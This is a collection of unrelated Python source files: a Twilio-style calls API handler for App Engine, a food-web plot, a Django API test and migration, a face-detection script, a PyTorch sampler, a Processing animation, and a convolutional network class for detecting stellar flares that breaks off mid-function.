# /2010-04-01/Accounts/{AccountSid}/Calls/{CallSid}
# /2010-04-01/Accounts/{AccountSid}/Calls
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.appengine.ext import webapp
from google.appengine.ext.webapp import util
from google.appengine.api import urlfetch
from google.appengine.api.labs import taskqueue
from handlers import base_handlers
from helpers import parameters, response, errors, xml_helper
from decorators import authorization
from models import calls, phone_numbers, incoming_phone_numbers, outgoing_caller_ids
import urllib
class CallInstance(base_handlers.InstanceHandler):
def __init__(self):
super(CallInstance,self).__init__()
self.AllowedMethods = ['GET']
self.InstanceModel = calls.Call.all()
self.InstanceModelName = 'Call'
# Initiates a call redirect or terminates a call. See Modifying Live Calls for details.
def post(self):
pass
# Represents a list of recordings generated during the call identified by {CallSid}. See the Recordings section for resource properties and response formats.
class CallInstanceRecordings(base_handlers.InstanceHandler):
def __init__(self):
super(CallInstanceRecordings,self).__init__()
self.AllowedMethods = ['GET']
self.InstanceModel = calls.Call.all()
self.InstanceModelName = 'Recording'
# Represents a list of notifications generated during the call identified by {CallSid}. See the Notifications section for resource properties and response formats.
class CallInstanceNotifications(base_handlers.InstanceHandler):
def __init__(self):
super(CallInstanceNotifications, self).__init__()
self.AllowedMethods = ['GET']
self.InstanceModel = calls.Call.all()
self.InstanceModelName = 'Notification'
# GET gets a list of calls
# POST initiates a new call
class CallList(base_handlers.ListHandler):
def __init__(self):
"""
To Only show calls to this phone number.
From Only show calls from this phone number.
Status Only show calls currently in this status. May be queued, ringing, in-progress, completed, failed, busy, or no-answer.
StartTime Only show calls that started on this date, given as YYYY-MM-DD. Also supports inequalities, such as StartTime<=YYYY-MM-DD for calls that started at or before midnight on a date, and StartTime>=YYYY-MM-DD for calls that started at or after midnight on a date.
EndTime Only show calls that ended on this date, given as YYYY-MM-DD. Also supports inequalities, such as EndTime<=YYYY-MM-DD for calls that ended at or before midnight on a date, and EndTime>=YYYY-MM-DD for calls that end at or after midnight on a date.
"""
self.InstanceModel = calls.Call.all()
self.AllowedMethods = ['GET']
self.AllowedFilters = {
'GET':[['To','='],['From','='],['Status','=']]#,['StartTime','='],['EndTime','=']]#Times are not implemented yet
}
self.ListName = 'Calls'
self.InstanceModelName = 'Call'
@authorization.authorize_request
def post(self,API_VERSION,ACCOUNT_SID,*args):
"""
From The phone number to use as the caller id. Format with a '+' and country code e.g., +16175551212 (E.164 format). Must be a Twilio number or a valid outgoing caller id for your account.
To The number to call formatted with a '+' and country code e.g., +16175551212 (E.164 format). Twilio will also accept unformatted US numbers e.g., (415) 555-1212, 415-555-1212.
Url The fully qualified URL that should be consulted when the call connects. Just like when you set a URL for your inbound calls.
Method The HTTP method Twilio should use when requesting the required Url parameter's value above. Defaults to POST.
FallbackUrl A URL that Twilio will request if an error occurs requesting or executing the TwiML at Url.
FallbackMethod The HTTP method that Twilio should use to request the FallbackUrl. Must be either GET or POST. Defaults to POST.
StatusCallback A URL that Twilio will request when the call ends to notify your app.
StatusCallbackMethod The HTTP method Twilio should use when requesting the above URL. Defaults to POST.
SendDigits A string of keys to dial after connecting to the number. Valid digits in the string include: any digit (0-9), '#' and '*'. For example, if you connected to a company phone number, and wanted to dial extension 1234 and then the pound key, use SendDigits=1234#. Remember to URL-encode this string, since the '#' character has special meaning in a URL.
IfMachine Tell Twilio to try and determine if a machine (like voicemail) or a human has answered the call. Possible values are Continue and Hangup. See the answering machines section below for more info.
Timeout The integer number of seconds that Twilio should allow the phone to ring before assuming there is no answer. Default is 60 seconds, the maximum is 999 seconds. Note, you could set this to a low value, such as 15, to hangup before reaching an answering machine or voicemail. Also see the answering machine section for other solutions.
"""
format = response.response_format(self.request.path.split('/')[-1])
if parameters.required(['From','To','Url'],self.request):
Phone_Number = incoming_phone_numbers.Incoming_Phone_Number.all().filter('PhoneNumber = ',self.request.get('From')).filter('AccountSid =',ACCOUNT_SID).get()
if Phone_Number is None:
Phone_Number = outgoing_caller_ids.Outgoing_Caller_Id.all().filter('PhoneNumber =', self.request.get('From')).filter('AccountSid =', ACCOUNT_SID).get()
if Phone_Number is not None:
Call = calls.Call.new(
From = self.request.get('From'),
To = self.request.get('To'),
PhoneNumberSid = Phone_Number.Sid,
AccountSid = ACCOUNT_SID,
Status = 'queued',
Direction = 'outbound-api'
)
Call.put()
response_data = Call.get_dict()
# the call has been queued, so ring it
Call.ring()
#ringing, what should we do? connect and read twiml and parse, fail, busy signal or no answer
#default is to connect, read twiml and do some things i guess
#Call.connect(Phone_Number, self.request)
"""
if self.request.get('StatusCallback',None) is not None:
StatusCallback = self.request.get('StatusCallback')
StatusCallbackMethod = self.request.get('StatusCallbackMethod','POST').upper()
if StatusCallbackMethod not in ['GET','POST']:
StatusCallbackMethod = 'POST'
elif Phone_Number.StatusCallback is not None:
StatusCallback = Phone_Number.StatusCallback
StatusCallbackMethod = Phone_Number.StatusCallbackMethod
if self.request.get('StatusCallback',None) is not None or Phone_Number.StatusCallback is not None:
Call.disconnect(StatusCallback,StatusCallbackMethod)
"""
response_data = Call.get_dict()
self.response.out.write(response.format_response(response.add_nodes(self,response_data,format),format))
else:
# we don't have a valid outgoing caller id to make the call from
self.response.out.write(response.format_response(errors.rest_error_response(400,"Resource not found",format,21212, 'http://www.twilio.com/docs/error/21212' ),format))
else:
self.response.out.write(response.format_response(errors.rest_error_response(400,"Missing Parameters",format),format))
def main():
application = webapp.WSGIApplication([
('/(.*)/Accounts/(.*)/Calls/(.*)/Recordings', CallInstanceRecordings),
('/(.*)/Accounts/(.*)/Calls/(.*)/Notifications', CallInstanceNotifications),
('/(.*)/Accounts/(.*)/Calls/(.*)', CallInstance),
('/(.*)/Accounts/(.*)/Calls.*', CallList)
],
debug=True)
util.run_wsgi_app(application)
if __name__ == '__main__':
main()
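# Hedged usage sketch (not wired into the app, authentication headers omitted):
# a client creating an outbound call against the CallList endpoint above. The
# host, AccountSid, and TwiML URL are placeholder values, not part of this project.
def _example_create_call():
    params = urllib.urlencode({
        'From': '+16175551212',  # must match an Incoming_Phone_Number or caller id for the account
        'To': '+14155551212',
        'Url': 'http://example.com/twiml',  # hypothetical TwiML document URL
    })
    return urlfetch.fetch(
        url='http://localhost:8080/2010-04-01/Accounts/ACXXXXXXXXXXXX/Calls.json',
        payload=params,
        method=urlfetch.POST)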
|
"""
Plot a snapshot of a food web graph/network.
Needs: Adjacency list of who eats whom (consumer name/id in 1st
column, resource name/id in 2nd column), and list of species
names/ids and properties such as biomass (node abundance), or average
body mass.
"""
import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
# import matplotlib.animation as ani #for animation
def GenRdmAdjList(N = 2, C = 0.5):
"""
Generate random adjacency list given N nodes with connectance
probability C
"""
Ids = range(N)
ALst = []
for i in Ids:
if np.random.uniform(0, 1) < C:
Lnk = np.random.choice(Ids, 2).tolist()
if Lnk[0] != Lnk[1]: #avoid self loops
ALst.append(Lnk)
return ALst
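# Hedged sketch (not called below): the module docstring describes real input as
# an adjacency list with consumer ids in column 1 and resource ids in column 2;
# a loader for a two-column CSV of that form might look like this
# (the filename is a hypothetical placeholder).
def ReadAdjList(fname="adjacency_list.csv"):
    """Read a who-eats-whom adjacency list from a two-column CSV."""
    import csv
    with open(fname) as f:
        return [[row[0], row[1]] for row in csv.reader(f)]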
## Assign body mass range
SizRan = ([-10,10]) #use log scale
## Assign number of species (MaxN) and connectance (C)
MaxN = 30
C = 0.75
## Generate adjacency list:
AdjL = np.array(GenRdmAdjList(MaxN, C))
## Generate species (node) data:
Sps = np.unique(AdjL) # get species ids
Sizs = np.random.uniform(SizRan[0], SizRan[1], MaxN) # generate body sizes (log10 scale)
###### The Plotting #####
plt.close('all')
##Plot using networkx:
## Calculate coordinates for circular configuration:
## (See networkx.layout for inbuilt functions to compute other types of node
# coords)
pos = nx.circular_layout(Sps)
G = nx.Graph()
G.add_nodes_from(Sps)
G.add_edges_from(tuple(AdjL))
NodSizs= 10**-32 + (Sizs-min(Sizs))/(max(Sizs)-min(Sizs)) #node sizes in proportion to body sizes
nx.draw(G, pos, node_size = NodSizs*1000)
plt.show()
|
from django.core import mail
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
class TestResendMail(APITestCase):
fixtures = ["user.json"]
url: str
@classmethod
def setUpTestData(cls):
cls.url = reverse("account_resend_email")
def setUp(self):
# Signup to get the key from the confirmation email
response = self.client.post(
reverse("account_register"),
{
"email": "new@test.at",
"password1": "cdpyHEKZ0KiJmlR",
"password2": "cdpyHEKZ0KiJmlR",
},
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_ok(self):
response = self.client.post(self.url, {"email": "new@test.at"})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(mail.outbox)
def test_get(self):
response = self.client.get(self.url, {"email": "new@test.at"})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_put(self):
response = self.client.put(self.url, {"email": "new@test.at"})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_patch(self):
response = self.client.patch(self.url, {"email": "new@test.at"})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_delete(self):
response = self.client.delete(self.url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
|
"""
Given a string of numbers and operators, return all possible results from computing all the different possible ways to
group numbers and operators. The valid operators are +, - and *.
Example 1
Input: "2-1-1".
((2-1)-1) = 0
(2-(1-1)) = 2
Output: [0, 2]
Example 2
Input: "2*3-4*5"
(2*(3-(4*5))) = -34
((2*3)-(4*5)) = -14
((2*(3-4))*5) = -10
(2*((3-4)*5)) = -10
(((2*3)-4)*5) = 10
Output: [-34, -14, -10, -10, 10]
"""
import re
__author__ = 'Daniel'
class Solution:
def diffWaysToCompute(self, input):
"""
:type input: str
:rtype: List[int]
"""
input_lst = re.split(r"(\D)", input)  # capturing parentheses keep the operators
nums = [int(x) for x in input_lst if re.match(r"\d+", x)]
ops = [x for x in input_lst if re.match(r"\D", x)]
ret = self.dfs_eval(nums, ops)
return ret
def dfs_eval(self, nums, ops):
ret = []
if not ops:
assert len(nums) == 1
return nums
for i, op in enumerate(ops):
left_vals = self.dfs_eval(nums[:i+1], ops[:i])
right_vals = self.dfs_eval(nums[i+1:], ops[i+1:])
for l in left_vals:
for r in right_vals:
ret.append(self._eval(l, r, op))
return ret
def _eval(self, a, b, op):
return {
"+": lambda a, b: a+b,
"-": lambda a, b: a-b,
"*": lambda a, b: a*b,
}[op](a, b)
if __name__ == "__main__":
assert Solution().diffWaysToCompute("1+1") == [2]
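# Also check the docstring's Example 2 (compare order-insensitively, since the
# recursion order determines the output order):
assert sorted(Solution().diffWaysToCompute("2*3-4*5")) == [-34, -14, -10, -10, 10]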
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 23 20:16:57 2020
@author: Soumya Kanti Mandal
"""
import cv2
import urllib.request
from matplotlib import pyplot as plt
from pylab import rcParams
image_url="https://skm96.github.io/image/s2.jpg"
image_name="skm.jpg"
urllib.request.urlretrieve(image_url, image_name)
image1 = cv2.imread("skm.jpg")
plt.imshow(image1)
# now fix the color channels and increase the figure size
def plt_show(image,title="",gray=False,size=(12,10)):
temp = image
#fix color
if gray==False:
temp=cv2.cvtColor(temp,cv2.COLOR_BGR2RGB)
#change img size
rcParams['figure.figsize'] = size[0] , size[1]
plt.axis("off")
plt.title(title)
plt.imshow(temp,cmap='gray')
plt.show()
#display image nicely
plt_show(image1,"Face Detection Phase 1")
# face detection using Haar cascades
haarcascade_url="https://raw.githubusercontent.com/opencv/opencv/master/data/haarcascades/haarcascade_frontalface_default.xml"
haar_name="haarcascade_frontalface_default.xml"
urllib.request.urlretrieve(haarcascade_url, haar_name)
#create facial detection classifier
detector=cv2.CascadeClassifier(haar_name)
# detect faces using the array
faces_list = detector.detectMultiScale(image1,
scaleFactor=1.2,
minNeighbors=10,
minSize=(64,64),
flags=cv2.CASCADE_SCALE_IMAGE)
print(faces_list)
# draw rectangles around faces to check
for face in faces_list: #draw rectangle for each face
#x & y axis and height & width
(x,y,w,h) = face
cv2.rectangle(image1,
(x,y), #top-left corner (image coordinates)
(x+w,y+h), #bottom-right corner
(0,255,0), #color green
3) #line thickness of rectangle
plt_show(image1)
# now crop and plot each detected face separately
for face in faces_list:
(x,y,w,h) = face
#plot each face now
face=image1[y:y + h, x:x + w] #crop to face
face_resize =cv2.resize(face,(80,80)) #resize
plt_show(face_resize,size=(6,5))
|
import torch
@torch.enable_grad()
def sample(net, m=64, n_ch=3, im_w=32, im_h=32, K=10, device='cpu', p_0=None):
if p_0 is None:
sample_p_0 = lambda: torch.FloatTensor(m, n_ch, im_w, im_h).uniform_(-1, 1).to(device)
else:
sample_p_0 = lambda: p_0.uniform_(-1, 1).to(device)
x_k = torch.autograd.Variable(sample_p_0(), requires_grad=True)
for k in range(K):
net_prime = torch.autograd.grad(net(x_k).sum(), [x_k], retain_graph=True)[0]
x_k.data += net_prime + 1e-2 * torch.randn_like(x_k)
return x_k.detach()
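# Hedged usage sketch: `net` is assumed to be any callable mapping an image batch
# to one scalar per example (an energy/score network). The toy net below is only
# for illustration and is not part of the original code.
if __name__ == '__main__':
    import torch.nn as nn
    toy_net = nn.Sequential(nn.Flatten(), nn.Linear(3 * 32 * 32, 1))
    samples = sample(toy_net, m=4, K=5)
    print(samples.shape)  # expected: torch.Size([4, 3, 32, 32])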
|
# Generated by Django 3.1.7 on 2021-04-09 14:20
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('rest_api', '0010_delete_country'),
]
operations = [
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(default='', max_length=100)),
('description', models.TextField(default='')),
('regions', models.ManyToManyField(to='rest_api.Region')),
],
),
migrations.CreateModel(
name='ExtremeSport',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('period', models.CharField(max_length=100)),
('daily_costs', models.CharField(max_length=15)),
('country', models.ForeignKey(blank=True, default='', on_delete=django.db.models.deletion.CASCADE, to='rest_api.country')),
],
),
]
|
from django.shortcuts import render
from rest_framework import generics
from .models import Book
from .serializer import BookSerializer
from rest_framework.response import Response
# Create your views here.
class GetInfo(generics.RetrieveAPIView):
def get(self, request, *args, **kwargs):
# serializer_class = BookSerializer
# Fetch my element from the DB
info = Book.objects.get(id = kwargs['pk'])
# Serialize it
test = BookSerializer(info)
print(test.data)
print(info)
return Response(test.data)
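# Hedged alternative (sketch, not referenced by any URLconf here): RetrieveAPIView
# can do the same lookup and serialization declaratively when queryset and
# serializer_class are set, without overriding get().
class BookDetail(generics.RetrieveAPIView):
    queryset = Book.objects.all()
    serializer_class = BookSerializer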
|
r = 15
def setup():
global location, velocity
size(640, 360)
this.surface.setTitle("Bouncing Ball with PVectors")
location = PVector(100, 100)
velocity = PVector(2.5, 5)
def draw():
background(235, 215, 182)
location.add(velocity)
# check boundaries
if (location.x > width - r) or (location.x < r):
velocity.x = velocity.x * -1
if (location.y > height - r) or (location.y < r):
velocity.y = velocity.y * -1
stroke(0)
fill(255, 100, 255)
ellipse(location.x, location.y, 2*r, 2*r)
|
import os, glob
import numpy as np
from tqdm import tqdm
import tensorflow as tf
from tensorflow import keras
from scipy.interpolate import interp1d
from astropy.table import Table, Column
__all__ = ['ConvNN']
class ConvNN(object):
"""
Creates and trains the convolutional
neural network.
"""
def __init__(self, output_dir, ds=None,
layers=None, optimizer='adam',
loss='binary_crossentropy',
metrics=None):
"""
Creates and trains a Tensorflow keras model
with either layers that have been passed in
by the user or with default layers used in
Feinstein et al. (2020; in prep.).
Parameters
----------
ds : stella.DataSet object
output_dir : str
Path to a given output directory for files.
training : float, optional
Assigns the percentage of training set data for training.
Default is 80%.
validation : float, optional
Assigns the percentage of training set data for validation.
Default is 10%.
layers : np.array, optional
An array of keras.layers for the ConvNN.
optimizer : str, optional
Optimizer used to compile keras model. Default is 'adam'.
loss : str, optional
Loss function used to compile keras model. Default is
'binary_crossentropy'.
metrics: np.array, optional
Metrics used to train the keras model on. If None, metrics are
[accuracy, precision, recall].
epochs : int, optional
Number of epochs to train the keras model on. Default is 15.
seed : int, optional
Sets random seed for reproducible results. Default is 2.
output_dir : path, optional
The path to save models/histories/predictions to. Default is
to create a hidden ~/.stella directory.
Attributes
----------
layers : np.array
optimizer : str
loss : str
metrics : np.array
training_matrix : stella.TrainingSet.training_matrix
labels : stella.TrainingSet.labels
image_fmt : stella.TrainingSet.cadences
"""
self.ds = ds
self.layers = layers
self.optimizer = optimizer
self.loss = loss
self.metrics = metrics
if ds is not None:
self.training_matrix = np.copy(ds.training_matrix)
self.labels = np.copy(ds.labels)
self.cadences = np.copy(ds.cadences)
self.frac_balance = ds.frac_balance + 0.0
self.tpeaks = ds.training_peaks
self.training_ids = ds.training_ids
else:
print("WARNING: No stella.DataSet object passed in.")
print("Can only use stella.ConvNN.predict().")
self.prec_recall_curve = None
self.history = None
self.history_table = None
self.output_dir = output_dir
def create_model(self, seed):
"""
Creates the Tensorflow keras model with appropriate layers.
Attributes
----------
model : tensorflow.python.keras.engine.sequential.Sequential
"""
# SETS RANDOM SEED FOR REPRODUCIBLE RESULTS
np.random.seed(seed)
tf.random.set_seed(seed)
# INITIALIZE CLEAN MODEL
keras.backend.clear_session()
model = keras.models.Sequential()
# DEFAULT NETWORK MODEL FROM FEINSTEIN ET AL. (in prep)
if self.layers is None:
filter1 = 16
filter2 = 64
dense = 32
dropout = 0.1
# CONVOLUTIONAL LAYERS
model.add(tf.keras.layers.Conv1D(filters=filter1, kernel_size=7,
activation='relu', padding='same',
input_shape=(self.cadences, 1)))
model.add(tf.keras.layers.MaxPooling1D(pool_size=2))
model.add(tf.keras.layers.Dropout(dropout))
model.add(tf.keras.layers.Conv1D(filters=filter2, kernel_size=3,
activation='relu', padding='same'))
model.add(tf.keras.layers.MaxPooling1D(pool_size=2))
model.add(tf.keras.layers.Dropout(dropout))
# DENSE LAYERS AND SOFTMAX OUTPUT
model.add(tf.keras.layers.Flatten())
model.add(tf.keras.layers.Dense(dense, activation='relu'))
model.add(tf.keras.layers.Dropout(dropout))
model.add(tf.keras.layers.Dense(1, activation='sigmoid'))
else:
for l in self.layers:
model.add(l)
# COMPILE MODEL AND SET OPTIMIZER, LOSS, METRICS
if self.metrics is None:
model.compile(optimizer=self.optimizer,
loss=self.loss,
metrics=['accuracy', tf.keras.metrics.Precision(),
tf.keras.metrics.Recall()])
else:
model.compile(optimizer=self.optimizer,
loss=self.loss,
metrics=self.metrics)
self.model = model
# PRINTS MODEL SUMMARY
model.summary()
def load_model(self, modelname, mode='validation'):
"""
Loads an already created model.
Parameters
----------
modelname : str
mode : str, optional
"""
model = keras.models.load_model(modelname)
self.model = model
if mode == 'test':
pred = model.predict(self.ds.test_data)
elif mode == 'validation':
pred = model.predict(self.ds.val_data)
pred = np.reshape(pred, len(pred))
## Calculate metrics from here
return
def train_models(self, seeds=[2], epochs=350, batch_size=64, shuffle=False,
pred_test=False, save=False):
"""
Runs n number of models with given initial random seeds of
length n. Also saves each model run to a hidden ~/.stella
directory.
Parameters
----------
seeds : np.array
Array of random seed starters of length n, where
n is the number of models you want to run.
epochs : int, optional
Number of epochs to train for. Default is 350.
batch_size : int, optional
Setting the batch size for the training. Default
is 64.
shuffle : bool, optional
Allows for shuffling of the training set when fitting
the model. Default is False.
pred_test : bool, optional
Allows for predictions on the test set. DO NOT SET TO
TRUE UNTIL YOU'VE DECIDED ON YOUR FINAL MODEL. Default
is False.
save : bool, optional
Saves the predictions and histories from each model
in an ascii table to the specified output directory.
Default is False.
Attributes
----------
history_table : Astropy.table.Table
Saves the metric values for each model run.
val_pred_table : Astropy.table.Table
Predictions on the validation set from each run.
test_pred_table : Astropy.table.Table
Predictions on the test set from each run. Must set
pred_test = True, or else it is an empty table.
"""
if type(seeds) == int or type(seeds) == float or type(seeds) == np.int64:
seeds = np.array([seeds])
self.epochs = epochs
# CREATES TABLES FOR SAVING DATA
table = Table()
val_table = Table([self.ds.val_ids, self.ds.val_labels, self.ds.val_tpeaks],
names=['tic', 'gt', 'tpeak'])
test_table = Table([self.ds.test_ids, self.ds.test_labels, self.ds.test_tpeaks],
names=['tic', 'gt', 'tpeak'])
for seed in seeds:
fmt_tail = '_s{0:04d}_i{1:04d}_b{2}'.format(int(seed), int(epochs), self.frac_balance)
model_fmt = 'ensemble' + fmt_tail + '.h5'
keras.backend.clear_session()
# CREATES MODEL BASED ON GIVEN RANDOM SEED
self.create_model(seed)
self.history = self.model.fit(self.ds.train_data, self.ds.train_labels,
epochs=epochs,
batch_size=batch_size, shuffle=shuffle,
validation_data=(self.ds.val_data, self.ds.val_labels))
col_names = list(self.history.history.keys())
for cn in col_names:
col = Column(self.history.history[cn], name=cn+'_s{0:04d}'.format(int(seed)))
table.add_column(col)
# SAVES THE MODEL TO OUTPUT DIRECTORY
self.model.save(os.path.join(self.output_dir, model_fmt))
# GETS PREDICTIONS FOR EACH VALIDATION SET LIGHT CURVE
val_preds = self.model.predict(self.ds.val_data)
val_preds = np.reshape(val_preds, len(val_preds))
val_table.add_column(Column(val_preds, name='pred_s{0:04d}'.format(int(seed))))
# GETS PREDICTIONS FOR EACH TEST SET LIGHT CURVE IF PRED_TEST IS TRUE
if pred_test is True:
test_preds = self.model.predict(self.ds.test_data)
test_preds = np.reshape(test_preds, len(test_preds))
test_table.add_column(Column(test_preds, name='pred_s{0:04d}'.format(int(seed))))
# SETS TABLE ATTRIBUTES
self.history_table = table
self.val_pred_table = val_table
self.test_pred_table = test_table
# SAVES TABLES IF SAVE IS TRUE
if save is True:
fmt_table = '_i{0:04d}_b{1}.txt'.format(int(epochs), self.frac_balance)
hist_fmt = 'ensemble_histories' + fmt_table
pred_fmt = 'ensemble_predval' + fmt_table
table.write(os.path.join(self.output_dir, hist_fmt), format='ascii')
val_table.write(os.path.join(self.output_dir, pred_fmt), format='ascii',
fast_writer=False)
if pred_test is True:
test_fmt = 'ensemble_predtest' + fmt_table
test_table.write(os.path.join(self.output_dir, test_fmt), format='ascii',
fast_writer=False)
def cross_validation(self, seed=2, epochs=350, batch_size=64,
n_splits=5, shuffle=False, pred_test=False, save=False):
"""
Performs cross validation for a given number of K-folds.
Reassigns the training and validation sets for each fold.
Parameters
----------
seed : int, optional
Sets random seed for creating CNN model. Default is 2.
epochs : int, optional
Number of epochs to run each folded model on. Default is 350.
batch_size : int, optional
The batch size for training. Default is 64.
n_splits : int, optional
Number of folds to perform. Default is 5.
shuffle : bool, optional
Allows for shuffling in sklearn.model_selection.KFold.
Default is False.
pred_test : bool, optional
Allows for predicting on the test set. DO NOT SET TO TRUE UNTIL
YOU ARE HAPPY WITH YOUR FINAL MODEL. Default is False.
save : bool, optional
Allows the user to save the kfolds table of predictions.
Default is False.
Attributes
----------
crossval_predval : astropy.table.Table
Table of predictions on the validation set from each fold.
crossval_predtest : astropy.table.Table
Table of predictions on the test set from each fold. ONLY
EXISTS IF PRED_TEST IS TRUE.
crossval_histories : astropy.table.Table
Table of history values from the model run on each fold.
"""
from sklearn.model_selection import KFold
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import average_precision_score
num_flares = len(self.labels)
trainval_cutoff = int(0.90 * num_flares)
tab = Table()
predtab = Table()
x_trainval = self.training_matrix[0:trainval_cutoff]
y_trainval = self.labels[0:trainval_cutoff]
p_trainval = self.tpeaks[0:trainval_cutoff]
t_trainval = self.training_ids[0:trainval_cutoff]
kf = KFold(n_splits=n_splits, shuffle=shuffle)
if pred_test is True:
pred_test_table = Table()
i = 0
for ti, vi in kf.split(y_trainval):
# CREATES TRAINING AND VALIDATION SETS
x_train = x_trainval[ti]
y_train = y_trainval[ti]
x_val = x_trainval[vi]
y_val = y_trainval[vi]
p_val = p_trainval[vi]
t_val = t_trainval[vi]
# REFORMAT TO ADD ADDITIONAL CHANNEL TO DATA
x_train = x_train.reshape(x_train.shape[0], x_train.shape[1], 1)
x_val = x_val.reshape(x_val.shape[0], x_val.shape[1], 1)
# CREATES MODEL AND RUNS ON REFOLDED TRAINING AND VALIDATION SETS
self.create_model(seed)
history = self.model.fit(x_train, y_train,
epochs=epochs,
batch_size=batch_size, shuffle=shuffle,
validation_data=(x_val, y_val))
# SAVES THE MODEL BY DEFAULT
self.model.save(os.path.join(self.output_dir, 'crossval_s{0:04d}_i{1:04d}_b{2}_f{3:04d}.h5'.format(int(seed),
int(epochs),
self.frac_balance,
i)))
# CALCULATE METRICS FOR VALIDATION SET
pred_val = self.model.predict(x_val)
pred_val = np.reshape(pred_val, len(pred_val))
# SAVES PREDS FOR VALIDATION SET
tab_names = ['id', 'gt', 'peak', 'pred']
data = [t_val, y_val, p_val, pred_val]
for j, tn in enumerate(tab_names):
col = Column(data[j], name=tn+'_f{0:03d}'.format(i))
predtab.add_column(col)
# PREDICTS ON TEST SET IF PRED_TEST IS TRUE
if pred_test is True:
preds = self.model.predict(self.ds.test_data)
preds = np.reshape(preds, len(preds))
data = [self.ds.test_ids, self.ds.test_labels, self.ds.test_tpeaks,
np.reshape(preds, len(preds))]
for j, tn in enumerate(tab_names):
col = Column(data[j], name=tn+'_f{0:03d}'.format(i))
pred_test_table.add_column(col)
self.crossval_predtest = pred_test_table
precision, recall, _ = precision_recall_curve(y_val, pred_val)
ap_final = average_precision_score(y_val, pred_val, average=None)
# SAVES HISTORIES TO A TABLE
col_names = list(history.history.keys())
for cn in col_names:
col = Column(history.history[cn], name=cn+'_f{0:03d}'.format(i))
tab.add_column(col)
# KEEPS TRACK OF WHICH FOLD
i += 1
# SETS TABLES AS ATTRIBUTES
self.crossval_predval = predtab
self.crossval_histories = tab
# IF SAVE IS TRUE, SAVES TABLES TO OUTPUT DIRECTORY
if save is True:
fmt = 'crossval_{0}_s{1:04d}_i{2:04d}_b{3}.txt'
predtab.write(os.path.join(self.output_dir, fmt.format('predval', int(seed),
int(epochs), self.frac_balance)), format='ascii',
fast_writer=False)
tab.write(os.path.join(self.output_dir, fmt.format('histories', int(seed),
int(epochs), self.frac_balance)), format='ascii',
fast_writer=False)
# SAVES TEST SET PREDICTIONS IF TRUE
if pred_test is True:
pred_test_table.write(os.path.join(self.output_dir, fmt.format('predtest', int(seed),
int(epochs), self.frac_balance)),
format='ascii', fast_writer=False)
def calibration(self, df, metric_threshold):
"""
Transforming the rankings output by the CNN into actual probabilities.
This can only be run for an ensemble of models.
Parameters
----------
df : astropy.Table.table
Table of output predictions from the validation set.
metric_threshold : float
Defines the ranking above which something is considered
a flare.
"""
# ADD COLUMN TO TABLE THAT CALCULATES THE FRACTION OF MODELS
# THAT SAY SOMETHING IS A FLARE
names = [i for i in df.colnames if 's' in i]
flare_frac = np.zeros(len(df))
for i in range(len(df)):
preds = np.array(list(df[names][i]))
flare_frac[i] = len(preds[preds >= metric_threshold]) / len(preds)
df.add_column(Column(flare_frac, name='flare_frac'))
# !! WORK IN PROGRESS !!
return df
def predict(self, modelname, times, fluxes, errs,
multi_models=False, injected=False):
"""
Takes in arrays of time and flux and predicts where the flares
are based on the keras model created and trained.
Parameters
----------
modelname : str
Path and filename of a model to load.
times : np.ndarray
Array of times to predict flares in.
fluxes : np.ndarray
Array of fluxes to predict flares in.
errs : np.ndarray
Array of flux errors for predicted flares.
injected : bool, optional
Returns predictions instead of setting attribute. Used
for injection-recovery. Default is False.
Attributes
----------
model : tensorflow.python.keras.engine.sequential.Sequential
The model input with modelname.
predict_time : np.ndarray
The input times array.
predict_flux : np.ndarray
The input fluxes array.
predict_err : np.ndarray
The input flux errors array.
predictions : np.ndarray
An array of predictions from the model.
"""
def identify_gaps(t):
"""
Identifies which cadences can be predicted on given
locations of gaps in the data. Will always stay
cadences/2 away from the gaps.
Returns lists of good indices to predict on.
"""
nonlocal cad_pad
# SETS ALL CADENCES AVAILABLE
all_inds = np.arange(0, len(t), 1, dtype=int)
# REMOVES BEGINNING AND ENDS
bad_inds = np.arange(0,cad_pad,1,dtype=int)
bad_inds = np.append(bad_inds, np.arange(len(t)-cad_pad,
len(t), 1, dtype=int))
diff = np.diff(t)
med, std = np.nanmedian(diff), np.nanstd(diff)
bad = np.where(np.abs(diff) >= med + 1.5*std)[0]
for b in bad:
bad_inds = np.append(bad_inds, np.arange(b-cad_pad,
b+cad_pad,
1, dtype=int))
bad_inds = np.sort(bad_inds)
return np.delete(all_inds, bad_inds)
model = keras.models.load_model(modelname)
self.model = model
# GETS REQUIRED INPUT SHAPE FROM MODEL
cadences = model.input.shape[1]
cad_pad = cadences/2
# REFORMATS FOR A SINGLE LIGHT CURVE PASSED IN
try:
times[0][0]
except (TypeError, IndexError):
times = [times]
fluxes = [fluxes]
errs = [errs]
predictions = []
pred_t, pred_f, pred_e = [], [], []
for j in tqdm(range(len(times))):
time = times[j] + 0.0
lc = fluxes[j] / np.nanmedian(fluxes[j]) # MUST BE NORMALIZED
err = errs[j] + 0.0
q = ( (np.isnan(time) == False) & (np.isnan(lc) == False))
time, lc, err = time[q], lc[q], err[q]
# APPENDS MASKED LIGHT CURVES TO KEEP TRACK OF
pred_t.append(time)
pred_f.append(lc)
pred_e.append(err)
good_inds = identify_gaps(time)
reshaped_data = np.zeros((len(lc), cadences))
for i in good_inds:
